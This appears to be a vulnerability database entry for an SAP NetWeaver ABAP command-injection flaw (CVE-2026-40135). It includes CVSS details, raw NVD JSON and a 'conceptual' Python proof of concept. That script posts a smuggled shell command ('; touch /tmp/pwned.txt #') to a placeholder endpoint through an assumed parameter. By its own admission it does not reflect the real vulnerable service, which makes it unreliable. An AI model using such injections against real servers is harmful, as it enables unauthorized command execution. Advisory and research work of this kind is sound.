Security Vulnerability Report
CVE-2026-40135 CVSS 6.5 MEDIUM

CVE-2026-40135

Published: 2026-05-12 03:16:12
Last Modified: 2026-05-12 03:16:12

Description

An OS Command Injection vulnerability exists in the SAP NetWeaver Application Server for ABAP and ABAP Platform that allows an authenticated attacker with administrative access to execute specially crafted shell commands on the server, bypassing the logging mechanism. This allows the execution of unintended OS commands without detection, potentially impacting the integrity and availability of the application, with no impact on confidentiality.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

No configuration data available.

SAP NetWeaver Application Server for ABAP (see SAP Note 3730019 for the specific affected versions)
SAP ABAP Platform (see SAP Note 3730019 for the specific affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept (Conceptual)
# This script demonstrates how an authenticated admin might exploit the command injection.
# Note: Actual endpoints require specific knowledge of the vulnerable SAP service.
import requests

# Target URL (Example)
target_url = "https://<sap-server>/vulnerable_endpoint"

# Attacker's session cookie (Admin privileges required)
session_cookie = {"sap-usercontext": "admin_session_token"}

# Payload attempting to inject a shell command (e.g., creating a file)
# The injection point depends on the vulnerable parameter, here assumed to be 'config_param'
payload = "; touch /tmp/pwned.txt #"

params = {
    "action": "update_config",
    "config_param": payload  # Malicious input
}

try:
    response = requests.post(target_url, data=params, cookies=session_cookie, verify=False)
    if response.status_code == 200:
        print("[+] Payload sent successfully.")
        print(f"[+] Server response: {response.text[:100]}")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

https://me.sap.com/notes/3730019
https://url.sap/sapsecuritypatchday

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40135", "sourceIdentifier": "[email protected]", "published": "2026-05-12T03:16:12.430", "lastModified": "2026-05-12T03:16:12.430", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "An OS Command Injection vulnerability exists in the SAP NetWeaver Application Server for ABAP and ABAP Platform that allows an authenticated attacker with administrative access to execute specially crafted shell commands on the server, bypassing the logging mechanism. This allows the execution of unintended OS commands without detection, potentially impacting the integrity and availability of the application, with no impact on confidentiality."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-77"}]}], "references": [{"url": "https://me.sap.com/notes/3730019", "source": "[email protected]"}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}]}}